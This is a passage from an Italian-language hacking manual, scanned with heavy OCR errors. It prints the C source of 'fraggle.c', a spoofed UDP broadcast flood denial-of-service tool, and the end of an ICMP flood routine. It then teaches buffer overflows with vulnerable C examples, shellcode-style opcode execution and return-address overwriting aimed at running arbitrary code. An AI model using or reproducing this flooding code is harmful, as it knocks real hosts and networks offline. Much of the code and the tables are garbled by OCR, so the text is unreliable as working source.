ip->id = htons (getpid() ) ; 
ip->frag_off = 0; 
ip->ttl = 255; 

ip->protocol = IPPROTO_ICMP ; 
ip->check = 0; 

ip->saddr = sm->sin . sin_addr . s_addr; 
ip->daddr = dst; 
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lcmp->type = ICMP_ECHO; 
icmp->code = 0; 

icmp->checksum = htons (~ (ICMP_ECHO « 8) ) ; /* thx 

grlffln */ 

/* send it on its way */ 

if (sendto (sm->s, packet, pktslze, 0, (struct sockaddr 

*) &sm->sin, 

slzeof (struct sockaddr)) == -1) 

{ 

perror ( "sendto () ") ; 
exit (-1) ; 

} 

f ree (packet) ; /* 

free wllly! */ 

} 

u_short 

in_chksum (u_short *addr, int lezi) 
{ 

register int nleft = len; 
register u_short *w = addr; 
register int sum = 0; 
u_short answer = 0; 

while (nleft > 1) 
{ 

sum += *w++; 
nleft -= 2; 

} 

if (nleft == 1) 
{ 

* (u_char *) (Sanswer) = * (u_char *)w; 
sum += answer; 

} 

sum = (sum » 16) + (sum + Oxffff); 
sum += (sum » 16); 
answer = ~sum; 
return (answer) ; 

} 

int calcolamax (string *s,int argc) 
{ 

int i,j; 

for (j=0; j<argc-l; j++) 
{ 

if(s[j] [0]<'l- Il s[j] [0]>- 9') break; 

) 

return j; 

} 



Altri Denial of Service 

Come ho detto all'inizio gli exploits legati ai Dos li ho volutamente trattai solo superficilamente 
in quanto, parte alcuni casi, spesso sono utilizzati soltanto per motivazioni di "rompimento di 
scatole" da parte dei vari Superman dell'hacking (quelli che ogi tre parole ci mettono due 
porco xxx). 

Alcune volte invece la tecnica è necessaria come ad esempio nel caso in cui si voglia azzittire 
un determinato host come nel caso delle tecniche di spoofing viste prima. 
Il seguente programma è in grado di portare immediatamente l'uso della CPU a valori 
altissimi, creando quindi un Dos. 
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struct pktlnfo 
{ 

int ps; 
int src; 
int dst; 

}; 

void fraggle (int, struct sockaddr_in *, u_long dest, struct pktinfo *) ; 
void sigint (int) ; 

unsigned short checksum (u_short *, int); 

int main (int argc, char *argv[]) 

{ 

struct sockaddr_in sin; 

struct hostent *he; 

struct pktinfo p; 

int s, num, delay, n, cycle; 

char **bcast = malloc (1024) , buf[32]; 

FILE *bfile; 

/* banner */ 

fprintf (stderr, " \nfraggle . c by TFreak \n \n ") ; 

/* capture ctrl-c */ 

signal (SIGINT, sigint); 

/* check for enough cmdline args */ 

if (argc < 5) 

{ 

fprintf (stderr, "usage: %s " 

" [dstport] [srcport] [psize] \n\n" 
"target\t\t= address to hit\n" 

"bcast file\t= file containing broadcast addrs\n" 
"num packets\t= send n packets (n = 0 is 

Constant) \n" 

"packet delay\t= usleepO between packets (in ms)\n" 
"dstport\t\t= port to hit (default 7)\n" 
" srcport \t\t= source port (0 for random) \n" 
"ps\t\t= packet size\n\n", 
argv[0]); 

exit (-1) ; 

} 

/* get port info * / 
if (argc >= 6) 

p.dst = atoi (argv[5] ) ; 
else 

p . dst = 7; 
if (argc >= 7) 

p.src = atoi (argv[6] ) ; 
else 

p . src = 0; 

/* packet size redundant if not using echo port */ 
if (argc >= 8) 

p.ps = atoi (argv[7] ) ; 
else 

p.ps = 1; 
/* other variables */ 
num = atoi (argv[3] ) ; 
delay = atoi (argv[4] ) ; 
/* resolve host */ 
if (isdigit (*argv[l] ) ) 

sin . sin_addr . s_addr = inet_addr (argv [1] ) ; 

else 
{ 

if ((he = gethostbyname (argv[l] ) ) == NULL) 
{ 

fprintf (stderr, "Can't resolve ho striarne ! \n\n" ) ; 
exit (-1) ; 

} 

memcpy ( (caddr_t) &sin . sin_addr, he->h_addr, he->h_length) ; 

} 
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sin. sin __port = htons (0) ; 

/* open bcast file and build array */ 

if ( (bfile = fopen (argv[2], "r")) == NULL) 

{ 

perror ("opening broadcast file"); 
exit (-1) ; 

} 

n = 0; 

while (fgets(buf, sizeof buf, bfile) != NULL) 
{ 

buf[strlen(buf) - 1] = 0; 

if (buf[0] == '#' // buf[0] == '\n' Il ! isdigit (buf [0] ) ) 
continue; 

bcast [n] = malloc(strlen(buf) + 1) ; 

strcpy (bcast [n ] , buf) ; 

n++; 

} 

bcast [n] = '\0'; 
foiose (bfile) ; 

/* check for addresses * / 

if (In) 

{ 

fprintf (stderr, "Error: No valid addresses in file!\n\n"); 
exit (-1) ; 

} 

/* create our raw socket */ 

if ( (s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW) ) <= 0) 
{ 

perror ("creating raw socket"); 
exit (-1) ; 

} 

printf ("Flooding %s (. = 25 outgoing packets) \n" , argv[l]); 

for (n = 0, cycle = 0; n < num / / !num; n++) 

{ 

if ( ! (n % 25) ) 
{ 

printf (" . ") ; 
fflush (stdout) ; 

} 

srand (tinte (NULL) * rand() * getpid() ) ; 
fraggle(s, Ssin, inet_addr (bcast [cycle] ) , &p) ; 
if (bcast [++cycle] == NULL) 

cycle = 0; 
usleep (delay) ; 

} 

sigint (0) ; 

} 

void fraggle (int s, struct sockaddr_in *sin, u_long dest, struct pktinfo 

*p) 

{ 

struct iphdr *ip; 
struct udphdr *udp; 
char *packet; 
int r; 

packet = malloc (sizeof (struct iphdr) + sizeof (struct udphdr) + p->ps) ; 
ip = (struct iphdr *) packet; 

udp = (struct udphdr *) (packet + sizeof (struct iphdr)); 

memset (packet , 0, sizeof (struct iphdr) + sizeof (struct udphdr) + p->ps) ; 

/* ip header */ 

ip->protocol = IPPROTO_UDP; 

ip->saddr = sin->sin_addr. s_addr; 

ip->daddr = dest; 

ip->version = 4; 
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lp->tot_len = htons (slzeof (struct Iphdr) + sizeof (struct udphdr) + p- 
>ps) ; 

ip->ihl = 5; 
ip->frag_off = 0; 

lp->check = checksum ( (u_short *)±p, slzeof (struct iphdr)); 
/* udp header */ 

udp->len = htons (sizeof (struct udphdr) + p->ps) ; 
udp->dest = htons (p->dst) ; 
if ( !p->src) 

udp->source = htons (rand() ) ; 

else 

udp->source = htons (p->src) ; 
/* send it on its way */ 

r = sendto (s, packet, sizeof (struct iphdr) + sizeof (struct udphdr) + p- 

>ps, 

0, (struct sockaddr *) sin, sizeof (struct sockaddr_in) ) ; 
if (r == -1) 
{ 

perror ( " \nSending packet ") ; 
exit (-1) ; 

} 

free (packet) ; /* free willy 21 */ 

} 

unsigned short checksum (u_short *addr, int len) 
{ 

register int nleft = len; 
register u_short *w = addr; 
register int sum = 0; 
u_short answer = 0; 

while (nleft > 1) 
{ 

sum += *w++; 
nleft — ; 

} 

if (nleft == 1) 
{ 

* (u_char *) (Sanswer) = * (u_char *) w; 
sum += answer; 

} 

sum = (sum » 17) + (sum & Oxffff); 
sum += (sum » 17); 
answer = -sum; 
return (answer) ; 

} 



void sigint (int ignoremewhore) 
{ 

fprintf (stderr, " \nDone ! \n \n ") ; 




I buf f ers overf low 

Quando una persona, dopo aver studiato l'hacking, scopre che di fatto questo non dispone di 
bacchette magiche per riuscire ad entrare nei sistemi remoti, spesso ci rimane male. 
La realtà è che non una bacchetta magica ma un piccolo bastoncino alcune volte c'è anche 
se utilizzarlo non è sicuramente una delle cose più semplici. 

Vi sarete chiesti negli altri capitoli sul come mai venivano trattati argomenti come l'assembler. 
Ecco il perché ! 

II sistema dei buffer overflow costituisce un metodo per raggiungere due obbiettivi differenti. 

Il primo è sicuramente quello più semplice da capire in quanto spesso vi sarà capitato senza 
volerlo e precisamente quello di vedere il programma che smette di funzionare creando un 
crash di sistema. 
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I programmi eseguiti in memoria sono costituiti da istruzioni in codice binario, interpretabili 
anche come codice assemblativo, le quali vengono eseguite dal processore mediante l'ausilio 
di quello che è il puntatore all'istruzione (IP o instruction pointer). 

Quando per qualsiasi motivo l'istruzione che sta per essere interpretata cambia, vuoi per un 
disturbo nella RAM che ha modificato il valore del codice operativo oppure perché i valori 
sono stati sovrapposti con altri per errori nell'ambito delle funzioni di assegnazione della 
memoria, il programma cessa di funzionare facendoci uscire a sistema operativo oppure 
bloccando tutto a tal punto da dover resettare fisicamente il sistema. 

Come stavamo dicendo il sistema di overflow dei buffers potrebbe avere due scopi ben 
definiti e precisamente il primo legato al tentativo di mandare in crash un programma mentre 
il secondo quello di mandare in esecuzione del codice specificato nel buffer stesso come 
codici esadecimali. 

II primo sistema potrebbe essere rappresento da uno schema usato per fare comprendere il 
principio il quale ha uno scopo più dimostrativo che pratico in quanto poi in realtà il metodo 
per eseguirlo si basa sempre su questo sistema ma utilizzando altri riferimenti di memoria. 

In ogni caso vediamo prima di cercare di dimostrare il concetto dell'overflow di memoria 
usando questo esempio. 

Supponete che la dichiarazione di una variabile relativa ad un buffer creai un allocazione di 
memoria a partire da un certo indirizzo, 00400000 per esempio. 

Come abbiamo detto nella parte legata alla programmazione, una variabile di qualsiasi tipo 
occupa in memoria un certo spazio, dipendente dal suo tipo, partendo da una locazione 
all'interno di uno dei segmenti o delle zone di memoria del programma. 
Questo significa che se da qualche parte ci fosse una routine che riceve una sequenza di 
caratteri da mettere in quel buffer questa inizierebbe il riempimento partendo dal primo byte di 
memoria riservato per questa variabile. 

Sempre in termini condizionali, se il programmatore avesse supposto che la lunghezza 
massima del buffer avrebbe potuto essere al massimo 100 caratteri significherebbe che per 
100 bytes a partire da quest'indirizzo non verrebbe messo null'altro in quanto il sistema 
avrebbe riservato la memoria solo per questa variabile. 

La definizione del buffer e la routine di inserimento dei valori in questo buffer potrebbe essere 
del tipo : 



# include <memory.h> 
^include <string.h> 

char buffer [100] ; 



char main (void) 
{ 

char datiricevuti [1000] ; 
gets (datiricevuti) ; 
memcpy (buffer, datiricevuti, 



strlen (datiricevuti) 



La variabile locale datiricevuti, come potete vedere, è di dimensioni molto maggiori a quella 
del buffer allocato globalmente, precisamente 10 volte. 

I dati letti dalla funzione GETS verrebbero da prima collocati in questa variabile locale e poi 
copiati dentro al buffer dalla funzione MEMCPY. 

Da questo si potrebbe capire che il valore inserito da tastiera potrebbe essere fino a 1000 

bytes visto che la variabile che riceve direttamente questi dati è di queste dimensioni. 

La funzione di copia al limite potrebbe copiare a partire dal primo indirizzo della variabile di 

destinazione anche molti BYTES di più di quanti ne potrebbe ricevere buffer. 

Tutto questo per il fatto che il programma di fatto non controlla in effetti la dimensione del 

buffer da copiare e usa una funzione, STRLEN, che imbastisce il numero di bytes di copiare a 

seguito della valutazione del solo buffer di lettura locale. 

Questo è quello che potrebbe capitare nei programmi indirizzati alla gestione di servers, 
sistemi operativi e librerie varie. 
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In altre parole alcuni valori passati dall'esterno potrebbero non venire controllati come 
lunghezza. 

Chiaramente i bytes eccedenti andrebbero a sovrapporsi da qualche altra parte della 
memoria. 

La visualizzazione del codice in assembler potrebbe essere : 



003998B0 unk_4098B0 db 
sub_401000+29»o 

003998B1 db 0 

003998B2 db 0 

003998B3 db 0 

003998B4 db 0 

003998B5 db 0 



DATA XREF : 



00401000 sub_401000 proc near ; CODE XREF: 

start+AF»p 

00401000 



00401000 var_3E8 


= byte ptr - 


3E8h 


00401000 








00401000 


sub 


esp, 


3E8h 


00401006 


lea 


eax, 


[esp+3E8h+var_3E8] 


0040100A 


push 


esi 




0040100B 


push 


edi 




0040100C 


push 


eax 




0040100D 


cali 


_gets 


00401012 


lea 


edi, 


[esp+3F4h+var_3E8 ] 


00401016 


or 


ecx, 


OFFFFFFFFh 


00401019 


xor 


eax, 


eax 


0040101B 


add 


esp, 


4 


0040101E 


repne scasb 




00401020 


not 


ecx 




00401022 


dee 


ecx 




00401023 


lea 


esi, 


[esp+3F0h+var_3E8] 


00401027 


mov 


edx, 


ecx 


00401029 


mov 


edi, 


offset unk_4098B0 


0040102E 


shr 


ecx, 


2 


00401031 


repe 


movsd 




00401033 


mov 


ecx, 


edx 


00401035 


and 


ecx, 


3 


00401038 


repe 


movsb 




0040103A 


pop 


edi 




0040103B 


pop 


esi 




0040103C 


add 


esp, 


3E8h 


00401042 


retn 







Come potete vedere la linea 00401029 mov edi, offset unk_4098Bo setta l'offset di dove 
caricare il valore. 

unk_4098B0 corrisponde al nome dato dal disassemblatore alla variabile buffer. 

Capirete che se il valore che verrà copiato è più corto 0 uguale ai 100 bytes riservati questi 

verranno inseriti nello spazio riservato per il buffer stesso. 

Se invece di 100 bytes la lunghezza fosse molto maggiore si andrebbe a sovra scrivere la 
zona di codice creando problemi seri di esecuzione. 

Nel caso precedente l'overflow del buffer avveniva nel caso di un buffer statico allocato in un 
segmento dati. 

La stessa cosa in ogni caso avrebbe potuto avvenire anche all'interno di un altro segmento 
come ad esempio nell'heap. 
Guardate il codice che segue. 
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^include <stdio.h> 
^include <stdlib.h> 
^include <string.h> 
# include <memory.h> 

void main (void) 
{ 

unsigned long diff; 

char *bufferl = (char *) malloc (16) ; 
char *buffer2 = (char *) malloc (16); 

diff = (unsigned long) buffer2 - (unsigned long) bufferl; 
printf("ADDR bufferl = %p, ADDR buffer2 = %p, diff = Ox%x 
bytes\n", bufferl, buffer2, diff), 
memset (buffer 2 , 'A', 15); 
buffer2[15] = '\0'; 

printf ( "Prima del buffer overflow: buffer2 = %s\n", buffer2) ; 

memset (bufferl, 'B ' , (unsigned int) (diff + 8) ) ; 

printf ("Dopo del buffer overflow: buffer2 = %s\n", buffer2) ; 

} 



Cosa abbiamo fatto ? 

Abbiamo dichiarato due puntatori ovvero due spazi sufficienti a contenere un indirizzo. 
Questo indirizzo è stato assegnato con quello relativo a due zone di memoria allocate con la 
funzione per l'allocazione dinamica MALLOC(). 

A questo punto bufferl contiene l'indirizzo della prima zona di memoria allocata mentre 
buffer2 quello del secondo. 

Diff a questo punto viene assegnato calcolando la differenza tra l'indirizzo del secondo buffer 
meno quello del primo. 

In buffer2 mettiamo tutte A mediante la memset. 

Ora nel bufferl assegniamo più valori 'B' di quanti essa possa contenere (la sua dimensione 
+ 8 bytes). 

In questo modo il programma ci mostra gli effetti dello sconfinamento, ovvero dell'overflow, 
eseguito. 

L'output a video è : 



c:\Temp>buffer 

ADDR bufferl = 00321 F80, ADDR buffer2 = 00321 F98, diff = 0x18 bytes 
Prima del buffer overflow: buffer2 = AAAAAAAAAAAAAAA 
Dopo del buffer overflow: buffer2 = BBBBBBBBAAAAAAA 

c:\Te mp> 



Esistono molti punti anche legati a DLL di sistema che possiedono degli indirizzi che possono 
creare problemi come ad esempio : 



Dentro a SHELL32.DLL v 4.72.3110.6 




07FCE2373 




In MSIEFTP.DLL v 5.00.2014.209 




Q71211EE9 




@71215C92 




@712121D8 




(371215BE6 
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Molti linguaggi come ad esempio Visual Basic possiedono all'interno del RUNTIME il controllo 
dei valori assegnati. 

In altre parole quando con questo linguaggio si dichiarava una variabile di un certo tipo, 
stringa ad esempio, in fase d'assegnazione il runtime conteggiava la lunghezza del valore 
passato e in caso di un valore eccessivo veniva mostrata una dialog con la segnalazione 
dell'errore. 

Il Linguaggio C questo non lo fa per cui il corretto dimensionamento degli oggetti deve 
sempre essere eseguito dal programmatore. 

La cosa tragica è che spesso ilo linguaggio C si basa su funzioni di libreria per l'esecuzione 
delle sue funzionalità più semplici come ad esempio l'input da tastiera e la stampa a video. 
Sono da considerarsi potenzialmente pericolose le seguenti funzioni: 



gets() 
sprint f () 
strcat () 
strcpyO 
streaddf) 
strecpy () 
strtrns () 
index () 
fscanf () 
scanf () 
sscanf () 
vsprintf () 
realpath () 
getopt () 
getpass () 



Chiaramente alcune volte i problemi sono interni alle librerie mentre altre volte i problemi 
sorgono da fatto che il programmatore non adottata certi sistemi per salvaguardare il sistema. 
Partendo dal fatto che i problemi dei buffers overflow sono legati all'uso di quelle funzioni che 
non controllano le lunghezze dei dati copiati dentro a dei buffers, l'identificazione dei posti 
dove teoricamente potrebbe essere forzato uno di questi può essere eseguito mediante 
l'analisi fatta con dei disassemblatori dei vari software e DLL che gestiscono i servers. 
Prendiamo ad esempio l'analisi di una DLL che fa parte del sistema di gestione di MS. 



74D40952 








74D40952 


loc_74D40952: 






.text:74D40947*j 






74D40952 




push 


dword ptr [ebp+8] 


74D40955 




push 


dword ptr [ edi ] 


74D40957 




cali 


ds : IstrcpyA 


74D4095D 




mov 


ax, [ebp+OCh ] 


74D40961 




mov 


[esi+3Ch] , ax 


74D40965 




mov 


eax, [ebp+1 Oh ] 


74D40968 




mov 


[esi+8Ch] , eax 


74D4096E 




mov 


eax, [ebp+1 4h ] 


74D40971 




mov 


[esi+OACh ] , eax 


74D40977 








74D40977 


loc_74D40977: 






.text:74D40918*j 






74D40977 









CODE XREF : 



CODE XREF: 



Qualche anno fa la EEYE, la casa che ha scritto RETINA, bombardò MS con dei dati in 
qualsiasi posto questo potesse accettare un input. 

Quello che cervano di ottenere era il crash di questo e di fatto trovarono un punto nel quale 
MS si bloccò lasciando dentro ai registri i seguenti valori. 

EAX = 00F7FCC8 EBX = 00F41130 ECX = 41414141 EDX = 77F9485A 
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La cosa interessante era legata al registro EIP (l'instruction pointer) uguale a 0x41414141 in 
quanto la sringa che loro avevano usato per bombardare il programma era di fatto una 
lunghissima sequenza di 0x41 . 

Questo significava che parte del valore inserito nel buffer era andato a sovrascrivere una 
valore di ritorno per cui era stato ripristinato dentro al registro EIP. 

Quando un hacker mediante un analisi dei programmi con disassemblatori riesce a trovare 
una funzione vulnerabile, deve anche guardare bene come la funzione prende l'input dal 
mondo esterno. 

Gli strumenti per questo tipo di analisi rimangono in primis i disassemblatori ma di fatto anche 
i debuggers possono essere usati. 

Alla fine di questo capitolo vedremo anche le metodologie di programmazione che possono 
salvare dai buffer overflow. 

Come abbiamo già visto durante la trattazione del linguaggio, il C non tratta come oggetti 
quelle che altri linguaggi definiscono con il termine di STRINGHE. 

Questo significa che sequenze di caratteri vengono viste dal C come se fossero degli arrays 
di tipi semplici. 

In altre parole la stringa "FLAVIO" viene vista come una sequenza di 7 caratteri (6 di 
lunghezza + 1 NULL di fine stringa). 

Nell'esempio precedente abbiamo visto cosa capita se un valore da una zona di memoria 
sconfina in un'altra zone relativa a qualche altro oggetto. 

Ma se questo punto fossimo andati a soprascrivere una zona con all'interno del codice, che 
cosa sarebbe capitato ? 

Parlando dell'assembler abbiamo visto come di fatto i nostri programmi possono essere visti 
come sequenze di CODICI OPERATIVI (OPCODE) ciascuno dei quali corrispondono ad un 
codice di un istruzione assembler relativa al processore. 
Facciamo un altro esempio. 

Pendiamo un piccolissimo programma in assembler che svolga qualche funzione. 

Esiste nel sistema operativo una zona del BIOS che richiamandola, dopo avere settato 1234 

nel registro AX, permette di fare il BOOT della macchina. 

Il seguente programma esegue il reboot del sistema. 



STI 




XOR 


BX,BX 


MOV 


DS,BX 


MOV 


BX, 04 72 


MOV 


AX, 1234 


MOV 


[BX] , AX 







Ora compiliamo il programma con il compilatore Visual C con il flag che permette di creare il 
sorgente in assembler. 



CI - Faprova.asm prova.c 



Andiamo a vedere la traduzione in assembler e ricopiamo i codici operativi in esadecimale di 
quel codice. 



OxFB, 0x31, OxDB, 0x8E, OxDB, OxBB, 0x72, 0x04, 0xB8, 
0x34, 0x12, 0x89, 0x07, OxEA, 0x00, 0x00, OxFF, OxFF 



A questo punto facciamOo una prova molto semplice. 

Mettiamo questi codici dentro ad un array numerico e poi facendogli credere al sistema che 
quello non è l'indirizzo di un array di numeri ma l'indirizzo d'inizio di una funzione proviamo a 
chiamarla. 
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Sorpresa ! 

Il codice viene eseguito esattamente come se in effetti fossero istruzioni originarie del 
programma. 

Questo significa che se noi da qualche parte riuscissimo a mettere in memoria i codici 
operativi di qualche funzionalità questa potrebbe essere tranquillamente eseguita. 



unsigned char far array[] = { 





/* 


[CODICE 


DI BOOT.COM] 


*/ 


OxFB, 0x31 , OxDB, 


/* 


FB 


STI 




V 


0x8E, OxDB, OxBB, 


/* 


31DB 


XOR 


BX,BX 


*/ 


0x72, 0x04, 0xB8, 


/* 


8EDB 


MOV 


DS,BX 


*/ 


0x34, 0x12, 0x89, 


/* 


BB7204 


MOV 


BX, 04 72 


*/ 


0x07, OxEA, 0x00, 


/* 


B83412 


MOV 


AX, 1234 


*/ 


0x00, OxFF, OxFF 


/* 


8907 


MOV 


[BX] , AX 


*/ 




/* 


EAOOOOFFFF 


JMP 


FFFF: 0000 


*/ 




/* 








*/ 











}; 

void main(void) 
{ 

void (far *funct) () = (void(far *) ()) array; 
(*funct) (); 

} 



Ma come ho già detto prima, a noi l'uso dei buffers overflow al fine di interrompere 

bruscamente un programma non ci interessa in quanto la cosa interessante è invece quella 

legata all'esecuzione di codice aggiuntivo il quale potrebbe essere relativo a qualche 

chiamata a procedure esterne come l'attivazione di shell o cose di questo tipo. 

Per fare questo si deve conoscere bene la struttura dei programmi e in particolare l'uso dello 

STACK. 

Per capire bene questo meccanismo, come abbiamo detto prima, si deve conoscere bene 
come un processo è organizzato in memoria. 

I processi sono suddivisi in tre regioni e precisamente nel segmento di TEXT o codice, in 
quello di DATA o dei dati ed infine nel segmento di STACK. 

La seguente immagine mostra i segmenti visti con un analizzatore di PE di programma. 



File Edit View Tools Window About 

e §: i l .a % 0 % sa a n ^ i g. i o ^ # & 




P DOS Header 






pi File Header 




a- 


j 


Optional Header 








Section Headers 








P fe-l 






+ 


J .rdata 
J .data 




B 


j 


lmports 






.j 


File Irmage 







La definizione di questi segmenti è stato visto nel capitolo legato alla programmazione 
assembler ma in ogni caso possiamo rinfrescare le idee ripetendo che questo è destinato a 
contenere il codice dei programmi ovvero le istruzioni.. 

I segmenti di DATA possono contenere dati inizializzati prima e poi quelli non inizializzati. 
In questa regione vengono salvate le variabili statiche. 
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Parte bassa memoria 




Codice (TEXT) 






Dati inizializzati 
Dati non inizializzati 






Stack 




Parte alta memoria 



Il concetto fondamentale comunque rimane quello dello stack il quale, volendo ripetere al 
definizione, è uno dei concetti fondamentali dell'informatica. 

Teoricamente è un tipo d'oggetto utilizzato per memorizzare dei valori in cui l'ultimo valore 
inserito sarà il primo ad uscire. 

Nel capitolo legato all'assembler lo abbiamo paragonato allo spunzone delle consumazioni 
del barista nel quale il primo biglietto a essere inserito sarà anche l'ultimo ad essere estratto. 
Il termine per definire questo tipo di gestione è LIFO ovvero LAST INPUT FIRST OUTPUT. 
In termine di programmi invece lo stack è un segmento utilizzato per la memorizzazione delle 
variabili locali e per il contenimento dei valori di ritorno legati alle chiamate delle funzioni. 
Quando una funzione viene chiamata il valore dell'indirizzo di dove questa è avvenuta viene 
inserita nello stack e successivamente il registro EIP viene aggiornato con l'indirizzo di dove il 
programma deve saltare. 

Successivamente quando la funzione viene terminata il valore viene prelevato dallo stack e 
viene ripristinato. 

Le istruzioni assembler che permettono di inserire ed estrarre valori dallo stack sono PUSH e 
POP. 

I computer moderni sono concepiti tenendo a mente i linguaggi di programmazione ad alto 
livello, al contrario dei sistemi di molti anni fa che avevano l'assembler come linguaggio 
fondamentale. 

Questi tipi di linguaggi contemplano nei concetti di procedura o funzione le strutture 
fondamentali per le loro gestioni. 

Come abbiamo appena detto la gestione dei flussi d'esecuzione quando esistono chiamate a 
funzioni pretendono che i valori di ritorno dopo le chiamate vengano memorizzati da qualche 
parte. 

Lo stack abbiamo appunto detto che è la zona di memoria ideale per tali gestioni. 

Lo stack fisicamente deve essere concepito come un blocco di memoria in cui i bytes sono 

consecutivi. 

All'interno del processore esistono due registri il cuoi scopo è appunto quello legato al 
corretto funzionamento dello stack. 

Ogni volta che avviene una chiamata ad una funzione l'indirizzo di ritorno viene PUSH-ato 
nello stack mentre tutte le volte che si presenta un istruzione di RET-urn da una di queste il 
valore viene POP-ato. 

II registro SP generalmente punta all'ultimo indirizzo dello stack e più precisamente sul primo 
bytes libero dopo di questo. 

Il seguente programmino server a stampare sp semplicemente copiandolo dentro al registro 
EAX all'interno della funzione sp(). 

Vi ricorderete che le funzioni restituiscono il valore di ritorno mediante il registro AX. 

unsigned long sp(vold) { 

asm ( "movi %esp, %sax") ; 

ì 
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printf("Ox%x\n", sp()); 

} 

Un programma che può essere usato per calcolare la posizione dello stack è quello che 
segue: 

/********************************** 

/* Calcitiate the stack pointer value for thls program. Slnce It doesn't */ 
/* vary very much front one program to another inside the same shell, the */ 
/* returned value can be used wlth a good accuracy. The output is in a */ 
/* binary format so that it can be concatenated to another string */ 
/* containing a portion of code. Warning !! The value returned mustn't */ 
/* have any of its 4 bytes set to 0, or it will be an 'end of string'. */ 
/* You can play with argv to subtract a value to the stack before giving */ 
/* it to stdout. */ 
/* */ 
/* Willy */ 

/******************************************* 

iinclude <stdio.h> 

static inline getespf) { 

asm ( " movi %esp, %eax "); 

} 

main (int argc, char **argv) { 
long unsigned esp; 
int decal=0; 

if (argc>l) decal=atoi (argv[l] ) ; 

esp=getesp () -decal; 
fwrite (Sesp, 4, 1, stdout) ; 
fwrite (Sesp, 4, 1, stdout) ; 



} 



Alcuni tipi di processori oltre a possedere questo registro considerano conveniente possedere 
un FRAME POINTER (FP) utilizzato per puntare ad una locazione fissa all'interno di un 
trame. 

La prima cosa che una procedura deve fare quando viene chiamata è salvare il valore del 
precedente FP e quindi salvare dentro a questo il valore di SP in modo da creare un nuovo 
FRAME POINTER e quindi salvare SP in modo di riservare spazio per le variabili locali. 
Questo codice è definito con il termine di PROCEDURE PROLOG. 

Quando una procedura termina o esce lo stack deve essere pulito nuovamente tramite un 
altro codice chiamato PROCEDURE EPILOG. 

Nel caso dei processori INTEL questo viene fatto dalle istruzioni assembler ENTER e LEAVE 
mentre nei processori MOTOROLA da quelle LINK e UNLINK. 
Creiamo il seguente programma : 

void funzione (int a, int b, int c) 
{ 

char bufferl [5 ] ; 
char buffer2 [10] ; 

ì 

void main (void) 
{ 

funzione (1,2,3); 

} 

Compiliamo ora sotto Linux con : 
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Andando a vedere con gdb , il debugger, la traslazione fatta in assembler ci troveremo 
davanti a : 

pushl $3 
pushl $2 
pushl $1 
cali funzione 

Come potete vedere i tre PUSH inseriscono nello stack i parametri passati alla funzione 
chiamata nella linea successiva la quale, quando riceverà il controllo, estrarrà i tre vaolori 
dallo stack e li userà nella sua procedura. 

Questa funzionalità viene eseguita dal seguente prologo della procedura : 

pushl %ebp 
movi %esp, %ebp 
subì $20, %esp 

Quseto prologo inserisce nello stack il frame pointer, quindi copia il contenuto del registro SP 
all'interno di EBP, facendolo diventare il nuovo frame pointer. 

L'istruzione che sottrae 20 (x14) a ESP è relativa al fatto di riservare spazio per le variabili 
locali ovvero quelle relative ai due buffer. 

Ricordiamoci che la memoria può essere indirizzata usando multipli della dimensione di una 
WORD. 

Una WORD nel nostro caso è 32 bits ovvero 4 BYTES. 

Questo significa che l'allocazione richiesta per il buffer con dimensione 5 (buffer1[5]) 
occuperà di fatto 8 BYTES (2 WORDS) mentre il secondo buffer di 10 elementi (buffer2[10]) 
ne occuperà in verità 12 BYTES (3 WORDS). 

Questa è la motivazione del perché del 20 come dimensione sottratta a SP. 

Tenendo in mente questo ecco a cosa sembrerà il nostro STACK quando la funzione verrà 

chiamata. 



Parte bassa della cima della memoria 












memoria 












buffer2 butteri sfp ret 


a 




b 




c 


<--[ ] [ 


] [ 


] 


[ ][ 


][ 


][ ] 


cima della parte bassa dello stack 













Un buffer overflow avviene quando in una zona di memoria viene memorizzati più dati di 
quanti questa potrebbe contenere. 

Come è possibile sfruttare questi errori di programmazione per fare eseguire del codice 
arbitrario ? 

Vediamo un altro esempio scritto in C. 



void function (char *str) { 
char buffer [16] ; 
strcpy (buffer, str) ; 

} 

void main () { 

char large_string[256] ; 
int i; 

for{ i = 0; i < 255; i++) 

large_string[i] = 'A'; 
function (large_string) ; 

} 

Come potete vedere in questo esempio esiste un classico buffer overflow dovuto al fatto che 
la dimensione del buffer passato alla function() è di fatto lunga 256 bytes mentre il buffer dove 
questo argomento viene passato è soltanto 16 bytes. 
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La funzione usata per copiare str in buffer è quella di libreria del C strcpy() la quale non 
controlla la dimensione della destinazione. 

Se al suo posto fosse stata usata strncpy() si sarebbe potuto specificare come argomento 
della funzione di copia la dimensione. 

Vediamo cosa vede lo stack quando viene chiamata la funzione. 




Come saprete la funzione strcpy() copia senza controllare fino a quando viene trovato il 
carattere NULL di fine stringa. 

Come abbiamo già detto il buffer di destinazione è circa 250 bytes più piccola della sorgente 
e questo significa che questo numero di bytes dopo lo spazio del buffer verranno sovrascritti. 
Come potete vedere dallo schema tra i valori su cui si va a scrivere c'e anche il valore di 
ritorno (ret) dopo la chiamata alla funzione. 

Dato che il buffer di partenza contiene delle lettere A uguali al numero esadecimale 0x41 
significa che il valore di ritorno della funzione dopo il buffer overfiow varrà 



Questo indirizzo è al di fuori dello spazio del programma ed è per questo motivo che quando 
il programma ritornerà e cercherà di leggere la successiva istruzione da eseguire avrete 
come segnalazione un segmentation violation. 

In ogni caso l'esempio ci mostra come potremmo cambiare volontariamente l'indirizzo di 
ritorno di una funzione indirizzando il tutto a qualche parte di codice nostro. 
Ora facciamo la prova per provare quanto detto. 

Rivediamo ora come lo stack vedeva la memoria del nostro primo esempio e come di fatto è 
possibile fare in modo che il programma esegua del codice arbitrariamente. 



buffer2 



butteri 



sfp 



ret 



J 



Prima di butteri c'è il valore sfp mentre il valore di ritorno e appunto subito prima di questo. 
In altre parole quest'ultimo è 4 bytes dopo il bufferl . 

Ricordiamoci che bufferl è di fatto 8 bytes e non 5 e quindi l'indirizzo di ritorno è dopo 12 

BYTES dall'inizio di butteri. 

Ora scriveremo una funzione come segue : 

void function (int a, int b, int c) { 
char bufferl [5 ] ; 
char buffer2 [10] ; 
int *ret; 

ret = bufferl + 12; 
(*ret) += 8; 

} 

void main () { 
int x; 
x = 0; 

function (1,2,3) ; 
x = 1; 

orintf("%d\n",x); 



Ora compiliamo il tutto in ambiente Linux con : 
gcc-S esempio.s esempio.c 
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Guardando dentro alla funzione main() vediamo che se il programma seguisse il flusso 
normale l'ultimo printf() stamperebbe a video il valore di X ovvero 1 . 

Questo capiterebbe se dopo avere chiamato la funzione questa ritornasse sull'istruzione 
successiva ovvero quella che assegna ad x il valore 1. 

